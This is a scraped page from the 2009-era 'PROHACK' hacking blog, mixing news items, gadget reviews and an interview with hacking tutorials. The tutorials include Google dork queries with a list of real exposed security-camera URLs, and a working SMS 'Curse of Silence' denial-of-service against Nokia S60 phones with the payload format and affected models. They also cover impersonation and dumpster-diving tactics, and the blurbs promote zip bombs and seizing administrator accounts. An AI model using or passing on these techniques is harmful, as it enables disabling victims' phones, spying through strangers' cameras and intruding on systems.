TOP 7 Must Read Articles at PROHACK – 2009 Reviewed

As 2009 goes away, its time to review what I did on PROHACK..and share the best of stuff with you folks again. I believe  these articles are a must read if you have been a regular here,and double if you are not. Prohack has gotten better with you guys and it was not possible without you..SO..Here are the Top 7 Must read articles at PROHACK -
Create a Zip Bomb of Death
A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.
How to Hack Administrator from Guest Account
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the  administrator password and getting all the privileges an administrator enjoys on windows..Interested ?
Hack PHP 4.4 websites in 20 seconds
Actually sites with PHP 4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.
Top 10 Tips to optimize your website
Making a website is easy,but making it survive through the Wild Wild Web is quite a formidable task. I have seen many potential websites crumble and vanish through the web in a short span of time,and today I will be sharing my knowledge with you. I have followed the 10 simple rules which have allowed me to get the love of my readers in such a short time and have made ProHack more than a name in the web..Read them and follow them.
Top 10 Anticipated games of 2009
2009 proved to be a great year for gaming and the developers wants to keep the roller coaster ride of top releases keep going with extremely hyped games by the top dogs of gaming. The list is compiled on the factors on how much is known about the game,how incredible it looks the current user reviews,and the following big boys made it on the top 10 most anticipated games of 2009.
Hack LG KG195 for Increased Feature
I used to have an LG KG195,an average mobile by LG electronics. A modest mobile with modest features,it has got Bluetooth, a basic media player and a VGA camera. However I soon got bored of this set and decided to tweak it to make it a more desirable device.Learn how to hack LG devices..
Top 10 LINUX speed hacks
As an extremely reliable Operating system, Linux  rarely needs to be rebooted. But when it does, it’s often slow to boot.Loads of Matrix style lines scrolling down the screen are sure to drive nuts added with boot time of GUI  initialization.. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult. (although some, unfortunately, are). Let’s take a look at Top 10 Speed hacks of Linux and let your linux box reincarnate with speed. 
Bonus -
Resident Evil 5 – An Honest Review
Resident Evil 5 was one of the most hyped games of this generation and was prominently featured in various Top 10  Lists. The incredible amount of hype it generated was contributed to the long development period,the over the top gorgeous looking trailers,gory in game footage and just the plain curiosity,whether it will be able to surpass its legendary predecessor or not..
5 Type Of Virus Writers
Whilst stumbling on the net,I found this humorous description of 5 types of virus writers written by an actual hacker.I really loved the overall tone of the article and thought its worthy to share it with you guys..Enjoy.

Happy new year..

PS : Like this tutorial ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

Posted by XERO. All Rights Reserved.

Technorati Tags: linux,blog update,cellphones and mobile,gaming,hacking,security,tutorials,top articles,top 10 articles,rdhacker,prohack,resident evil 5,virus writing,programming,microsoft,windows

read more "TOP 7 Must Read Articles at PROHACK – 2009 Reviewed"

Learn How to Hack Online Security Cameras using Google Hacking

Google hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.

The Google Hacking Database is located at http://johnny.ihackstuff.com.

For Hacking Security Cameras from google, Type in Google search box exactly as hit enter

inurl:”viewerframe?mode=motion”

Click on any of the search results. I found below:

• http://66.209.109.2:60006/ViewerFrame?Mode=Motion&Language=0
• http://birdtable.derby-college.ac.uk/ViewerFrame?Mode=Motion&Language=4
• http://125.206.34.116/cgi-bin/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Motion&Interval=10&Size=STD&PresetOperation=Move&Language=0
• http://cube.northwestcollege.edu/ViewerFrame?Mode=Motion&Language=0

AND MANY MORE....

Other search queries through you can gain access to other cameras is

intitle:”Live View / – AXIS”

Google is a pretty powerful search tool,You knew that. You can use it to find information, but you can also use it to find downloadable MP3s, books, videos, and other items.

We are going to assume you are just looking for legally available downloads, but the truth of the matter is if someone?s posted an MP3 (copyrighted or not) to their web page, Google can find it.

But who has the time to memorize all the search modifiers, index of, last modified, parent directory, description size (.mp3|.wma|.ogg).....That's where Google Hacks comes in. This handy little app will let you search for dozens of file types, song lyrics, cached pages, fonts, and other little goodies hanging out on the web.

Just download and install Google Hacks for Mac, Linux, or Windows, fire it up and enter your search term and check the boxes next to the type of search you want to perform. Your results will show up in your default web browse.

To download Google Hack Software CLICK HERE

read more "Learn How to Hack Online Security Cameras using Google Hacking"

Chinese novelist Mian Mian sued Google

A Beijing judge has told the Chinese novelist Mian Mian to hold settlement talks, who is suing Google over its plan to create an online library.

After a two-hour hearing, the court ordered both sides to talk but did not set a deadline for reporting back, according to the author's lawyer.

She is seeking damages of 61,000 yuan ($8,950; £5,576) and a public apology.

The lawsuit was filed in October after Google scanned one of Mian Mian's books, Acid House, into its library.

Google said it had removed the book as soon as it learned of the lawsuit, but had no further comment on the case.

Mian Mian writes risque novels - including titles such as Panda Sex and Candy - about China's underworld of sex, drugs and nightlife. Most of her work is banned in China.

She is not alone in complaining about copyright issues raised by Google's online library. The China Written Works Copyright Society is also looking for compensation for other Chinese authors whose work is included in the project.

In France, a court ordered Google to stop digitising French books without the publisher's approval. The search engine was also told to pay 300,000 euros ($430,000; £268,000) in damages and interest to French company La Martiniere, which had sued for copyright infringement for scanning book excerpts.

In the US, Google agreed a $125m settlement with American authors and publishers - although this is still waiting for final court approval.

SOURCE: BBC News

read more "Chinese novelist Mian Mian sued Google"

How to Hack Nokia Phones – Remote DDOS Attack using SMS

Yep,One can hack Nokia phones by just sending a SMS,seems devilish isn't it? Although this vulnerability was found more than an year ago, I recently tried it and found it working in many sets. The vulnerability dubbed as “Curse of Silence” affects all Nokia Symbian 60/Series 60 devices and allows for remote SMS/MMS Denial of Service.One can send a specially crafted sms to lockup/crash any Series 60 device.

What is Required ?

• MSISDN of the target.
• A Mobile phone service provider which allows sending of SMS messages (Airtel in my case)
• (Almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to "Internet Electronic Mail" )

Risk Levels

Although the vulnerability is spread across many versions of S60 platform,the Risk level is quite high for (for S60 2.6 and 3.0 devices)as upon attack,the target will not be able to receive any SMS or MMS messages until the device is Factory Resetted and Medium for S60 2.8 and 3.1 devices as upon Ddos attack,the target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted.

 

The Attack

One can send an email using an sms by setting the messages Protocol Identifier to "Internet Electronic Mail" and formatting the message like this:

<email-address><space><message body>

The simplest attack will be -

[email protected]

If such messages contain an <email-address> with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do,however, signal to the SMS Career that they have received the message.

Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering "*#7370#" ) or using a Vulcan Death Grip. 

Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters after that the device will not be able to receive any other SMS message and the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely "empty" device. 

After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts it is only able to receive the first part and will display the "not enough memory" warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence" message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.

Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.

Detailed List of affected phones

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected. I short if you own one of these,you are rounded unless u have a firmware upgrade/fix release by Nokia which fixes this attack.

S60 3rd Edition, Feature Pack 1 (S60 3.1)

• Nokia E90 Communicator
• Nokia E71
• Nokia E66
• Nokia E51
• Nokia N95 8GB
• Nokia N95
• Nokia N82
• Nokia N81 8GB
• Nokia N81
• Nokia N76
• Nokia 6290
• Nokia 6124 classic
• Nokia 6121 classic
• Nokia 6120 classic
• Nokia 6110 Navigator
• Nokia 5700 Xpress Music

S60 3rd Edition, initial release (S60 3.0)

• Nokia E70
• Nokia E65
• Nokia E62
• Nokia E61i
• Nokia E61
• Nokia E60
• Nokia E50
• Nokia N93i
• Nokia N93
• Nokia N92
• Nokia N91 8GB
• Nokia N91   
• Nokia N80
• Nokia N77
• Nokia N73
• Nokia N71
• Nokia 5500
• Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8)

• Nokia N90
• Nokia N72
• Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6)

• Nokia 6682
• Nokia 6681
• Nokia 6680
• Nokia 6630

 

Credits

Tobias Engel – The Original Vulnerability Founder

Tested and implemented on Airtel carrier using Nokia 3120 classic and N70/N73/E51 by XERO

 

 

Posted by XERO . ALL RIGHTS RESERVED.Source

Technorati Tags: tutorials,cellphones and mobile,hacking,how to,security,top articles,rdhacker,prohack,nokia,N series,Hack mobiles,S60 hacked,sms hacking

 

read more "How to Hack Nokia Phones – Remote DDOS Attack using SMS"

Nokia N900 Review

The market has been flurried by smartphones recently and Iphone stole the show by merging great looks with some really cool widgets and making it a must have. Losing its dominance over the Smartphone market,the Finnish mobile king Nokia tends to fight back by releasing N900.Earlier Nokia Smartphone came with home grown Symbian OS but this time Nokia has experimented by packing N900 with the stunning Linux distribution Maemo 5 which itself is a slimmed down version of Debian Linux and have added a host of top-end features, including a sizeable 3.5in touch screen, slide-out Qwerty keyboard, 5Mp camera with Carl Zeiss optics, Wi-Fi , A-GPS, quad-band and much more besides…
 
N900 is a beauty to behold and is chiseled to perfection (keeping in mind the fact that I tend to get sentimental everytime I see a cool gadget) and sports a sleek screen,black minimalistic looks and feels very pocketful.The keypad is quite tactile and responsive despite the small keys it sports.
Maemo 5 looks quite similar to its Symbian predecessor and Nokia has made a promising move by moving on to open source Linux platform (3 cheers to Nokia).The Linux OS is powered by fast ARM Cortex A8 processor and Open GL ES 2.0 graphics and performs well by providing additional usability with a great user interface.

Frequent tasks like SMSing and Emailing is easy on N900 and it also supports Facebook widgets and sports a browser based on Firefox which is a good thing as it can handle multiple pages at once and updates them in real time.The camera takes surprisingly good pics owning to its Carl Zeiss optical lens and while it doesn't have a huge arrange of settings, it does offer macro, action and portrait modes, plus a dual LED flash, though there's no smile detection, timer or multi-shot options.

Watching videos is a delight on N900,the 800X480 screen vivdly displays videos in amazing quality.Its supports major video formats and has a TV out option too.The Music player of  N900 is attractive and the phone itself is bundled with above average earphones. There is a basic FM which doesnt supports autotune. Also the phone supports onboard 32 GB memory and supports 16 GB external MicroSD card (just in case you are not satisfied by putting your entire audio collection on it). Call quality is good but the battery is a concern since owing its use of multimedia apps,it barely lasted a day on heavy use.

Final Verdict
Nokia N900 is a definitive phone if you have enough moolah to buy one.The Linux OS is solid,the interface intuitive at the end of the day,its a Nokia – the second name of quality (correct me if its wrong). Its a joy to use,a beauty to behold and the ultimate phone to flaunt to your friends.Nothing more..Nothing less.
Price in India – 650 $ , 500 EURO ,INR 34000/- approx

-XERO
You can also read N96 Review

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.


Posted by XERO . ALL RIGHTS RESERVED.

Technorati Tags: cellphones and mobile,consumer,review,nokia,n900,linux,rdhacker,prohack,technology news,technology

read more "Nokia N900 Review"

United States finally appoints new Cybersecurity Coordinator: Mr.Howard Schmidt

The White House announced on Tuesday the appointment of former eBay Chief Security Strategist Howard Schmidt to the post, after six month of President Barack Obama pledged to appoint a cybersecurity advisor.He will also work closely with his economic team to ensure that our cybersecurity efforts keep the nation secure and prosperous.

In 1967, Schmidt joined the Air Force and served in a variety of capacities until 1983, when he joined the police force in Chandler, Arizona, according to an online biography. In 1994, he served as a computer-forensics investigator for the FBI's Drug Intelligence Center and has served in similar capacities for the U.S. Air Force and the U.S. Army Reserves. He subsequently spent five years at Microsoft as the chief security strategist, leaving to join the Bush administration as Special Advisor to the President for Cybersecurity in 2001. He returned to the private sector in 2003, joining eBay as chief security strategist.

Since leaving eBay in 2005, Schmidt has worked in a number of different posts, including at the U.S. Department of Homeland Security.

The President was personally involved in the selection of Mr. Schmidt, and that he will have regular and direct access to the President for cybersecurity issues.

Clarke is the chairwoman of the House Committee on Homeland Security's Subcommittee on Emerging Threats, Cybersecurity and Science and Technology, which legislates many cybersecurity issues.

In May, the president released a review of the nation's cybersecurity policies and established the post of Cybersecurity Coordinator. Since then, numerous security professionals had refused the post.

SOURCE: www.securityfocus.com

read more "United States finally appoints new Cybersecurity Coordinator: Mr.Howard Schmidt"

IIS service vulnerability leaves users to attack

Another critical vulnerability have been found in the Microsoft IIS web service which allows malicious users to upload malicious files by appending innocent filename extensions like “jpg” to malicious files. The problem arises from by the way Microsoft IIS parses file names with colons or semicolons in them which can allow attackers to bypass filters and potentially trick server into running a malware.

Soroush Dalili,the security researcher who found the flaw commented “ Impact of this vulnerability is absolutely high as an attacker can bypass file extension protections by using a semicolon after an executable extension such as '.asp,' '.cer,' '.asa' and so on," he continued "Many web applications are vulnerable against file uploading attacks because of this weakness of IIS."

Secunia,a Danish computer security service provider,confirmed the bug on a machine running a fully patched version of Windows 2003 R2 SP2 with Microsoft IIS version 6.

A Microsoft spokeswoman said company researchers are investigating the report. They are not aware of attacks targeting the reported vulnerability, she said.

 

Via The Registrar

 

POSTED BY XERO. ALL RIGHTS RESERVED.

Technorati Tags: microsoft,security,hacking,windows,technology news,rdhacker,prohack

read more "IIS service vulnerability leaves users to attack"

Learn How to Enumerate MAC Address and Total NICs using GETMAC

1. The GETMAC application is used to identify the Media Access Control (MAC) address assigned to each network card (NIC) of the target.
2. GETMAC application will also identify the total number of NICs in the target.
3. Establish NULL session first
4. Then from a command prompt, type the following with the syntax of: getmac IP Address
5. The target MAC addresses have been identified as well as the total number of NICs. In this case, two NICs have been identified as shown in the below fig.
6. In this case, the target has the following MAC addresses for each identified NIC:

NIC 1: 00-0C-29-A3-E4-40

NIC 2: 24-C8-20-52-41-53

read more "Learn How to Enumerate MAC Address and Total NICs using GETMAC"

Dumpster Diving and Personnel are strong Social Engineering Techniques

• An attackers can easily retrieve the companies consider sensitive information thrown out daily in the normal garbage cans
• One can literally climbing into the company dumpsters and pilfering through the garbage
• Critical information such as names, Social Security numbers, addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere.
• So many companies are still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay or take, and so forth.
• Another social engineering attack that also proves to be very successful is not to verify the personnel credentials - when an attacker dresses in the uniform of those personnel considered “honest” and “important” or even “expensive.” For example; an attacker purchases/steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools, etc. and perhaps even an “official-looking” identification badge or a dolly carrying “equipment.” These attackers generally have unchallenged access throughout the building as employees tend to see “through” these types of people.

read more "Dumpster Diving and Personnel are strong Social Engineering Techniques"

How Hackers Manipulate the Live Data Stream on Internet

1. First of all install WebGoat and configure Web browser
2. We will use the tool Achilles. It is a tool designed for testing the security of Web applications. Achilles is a proxy server, which acts as a man-in-themiddle during an HTTP session. For more about Achilles, pls check its official website.
3. Double-click the webgoat.exe icon from the directory containing the WebGoat application.

4. onfigure the LAN setting as shown in the below fig

5. Run the Achilles application & select the options of the application as shown in below fig.

Intercept mode ON

Intercept Client Data

Ignore .jpg/.gif

Select Log to File - Save the data

6. Your Achilles screen should look like the following.

7. Open Internet Explorer and Adjust both screens equally on your desktop as shoen below.

8. Click the Start button on Achilles and notice that the status bar along the lower-left side of Achilles will let you know it is running.

9. In the address bar of Internet Explorer, enter the following address:

http://localhost/WebGoat/attack/

10. Press Enter, and Achilles will list the data flowing through to the Tomcat application. Click the Send button in Achilles. You will be presented with a login screen. For the User Name and Password enter the word guest. click the Send button again.

11. Click the Send button again & WebGoat screen will be displayed in the Web browser.

12. Under the Unvalidated Parameters section, specifically the Hidden Field Tampering area. Click on this area.

13. Click the Send button again.

14. WebGoat will appear with a shopping cart as shown below.

15. Click the Purchase button. Within Achilles you will see the QTY=1 & is Price=4999.99. Now if you want to make a purchase, whose actual cost is 4999.99 but you have only 1.99 in your account, Within Achilles edit the 4999.99 to 1.99 and then click the Send button.

16. EUREKAAAAA....!!! The sale has completed, with a total charge of $1.99.

NOTE: THIS IS ONLY THE DEMONSTRATION OF THIS TECHNIQUE AND FOR EDUCATION PURPOSE ONLY

read more "How Hackers Manipulate the Live Data Stream on Internet"

Twitter's domain name hijacked by the "Iranian Cyber Army."

On Thursday, an unknown attacker hijacked Twitter's domain name and redirected visitors to an unrelated site hosting a page claiming Twitter had been hacked by the "Iranian Cyber Army." Evidence indicates, however, that the attackers were able to change the domain-name system (DNS) entries at Twitter's provider, Dyn Inc., said Rod Rasmussen, president and CEO of Internet Identity, an infrastructure security firm which monitors DNS changes.

"First of all the name servers themselves didn't change, so someone was updating things at the provider," Rasmussen said. Because other clients were not showing signs of DNS hijacking, it's unlikely that Dyn itself had been breached, Rasmussen said. "We didn't see anything else at Dyn that indicated signs of that the service had been compromised."

On Friday, Dyn confirmed that the attacker had the proper credentials to log into Twitter's account with the company and change the addressed assigned to various hosts in the Twitter.com domain. While some media reports have called the attack a hack or a defacement against the site, neither term applies, said Kyle York, vice president of sales and marketing for the firm.

"From our point of view, no unauthenticated users logged into the system," York said.
In reality, the company's domain name had been hijacked by the vandals and visitors redirected to an unrelated site hosting the page. Passive domain-name service (DNS) records showed the DNS poisoning, as Twitter's record pointed first to two domains registered in Moldova and then to a domain registered to an undisclosed person in Pompano Beach, Florida, according to information posted by the SANS Internet Storm Center.

Twitter acknowledged the issue late last night, following earlier media reports.
"Twitter’s DNS records were temporarily compromised but have now been fixed," the site administrators' wrote at 11:28 p.m. PT. "We are looking into the underlying cause and will update with more information soon."

read more "Twitter's domain name hijacked by the "Iranian Cyber Army.""

A quick review to few top rated hacking posts

ACCESS GRANTED....To hackers on my System ?????

SURVEILLANCE VIA INTERNET CONNECTION

OH NO! MY SYSTEM’S INFECTED

Learning the system loop hole

read more "A quick review to few top rated hacking posts"

Interview of Pawan Kumar Singh : The CISO of Tulip Telecom

Pawan Kumar Singh, the Chief Information Security Officer (CISO) of Tulip Telecom has an illustrious infosec career to his credit. Prior to his stint with Tulip Telecom, Singh was instrumental in setting up information security function and IS audit function for Indian industry leaders like Bharti Airtel. He shares lessons from his infosec career.

Q:How would you define the CISO's role in enhancing an organization's overall information security levels?

Pawan Kumar Singh: IT is a small factor in the whole scheme of information security. The person in charge of information security should understand every business aspect [like human resources (HR), administration and legal operations]. We need to convert technical lingo into financial risks for the management's understanding. CISO's role is to guide the management when it comes to risk aligned with the line of business. So CISOs can be viewed as consultants. A CISO faces various organizational bottlenecks, since you basically police every individual's activities and find loopholes in business functions. Buy-in for security initiatives come only when top management is committed to security.

Can you give some tips for infosec professionals on how to groom themselves to become CISOs?

Pawan Kumar Singh: Security per say cannot be taught. It is a mindset which you develop over a period of time. A security professional should have a mindset which is always be able to detect risk aligned with processes.

To build a career in infosec, you should thoroughly understand three aspects: security operations (IT network), processes and compliance. A thorough knowledge of technology is necessary, although you may not need to know every product. Also you should understand the difference between policy, processes, procedure and guidelines. These are often used interchangeably.

How far has your role as a CISO changed over the years?

Pawan Kumar Singh: Seven years back, I was quite hands-on with technology. After I moved to Bharti Airtel, I was responsible for establishment of the information security team and audit function. Internal audit is critical, as it helps the organization to understand third party performance. These audits face resistance, and third parties often hide information. We started seeing IT audit alignment after a few audit cycles.

When I joined to Tulip as the CISO, there was a larger change in my role. It required me to get out of operational mindsets and adopt a strategic outlook. The only way to learn was through observation and interaction. I had the right people around me. You should interact with the C-level to understand business objectives and how they perceive risk. Infosec is a field where you need to learn constantly.

Can you tell us about the infosec landscape at Tulip and your priorities for 2010?

Pawan Kumar Singh: At Tulip, security measures are being implemented a bit slowly but strategically. In the past, there were bottlenecks due to change of management, but things are stable now. I am seeing a positive change in the management's mindset; they are realizing that security should be imbibed in the organizational DNA. It will take a while to change a 12 year old organization.

With each passing day, we are getting more process oriented. My first priority is to align three critical functions — administrative, HR and IT. If you can get this alignment, you can be assured that 70% of your infosec requirements are complete. Although I am not making any specific demands in the 2010 security budget, I will ask for budgets to increase automation in the administrative and HR functions. We want to bring more control in these functions. I also take care of ISO certification for Tulip, which includes ISO 27001, ISO 9000, ISO 20000.

In 2010, I plan to deploy an end point security solution for our laptop and desktop users. We will further strengthen our perimeter security and audit functions. There will also be an increase in employee training and awareness session investments to change user mindsets.

You can catch him on Linkedin @ http://in.linkedin.com/in/singhpk

SOURCE: http://searchsecurity.techtarget.in

read more "Interview of Pawan Kumar Singh : The CISO of Tulip Telecom"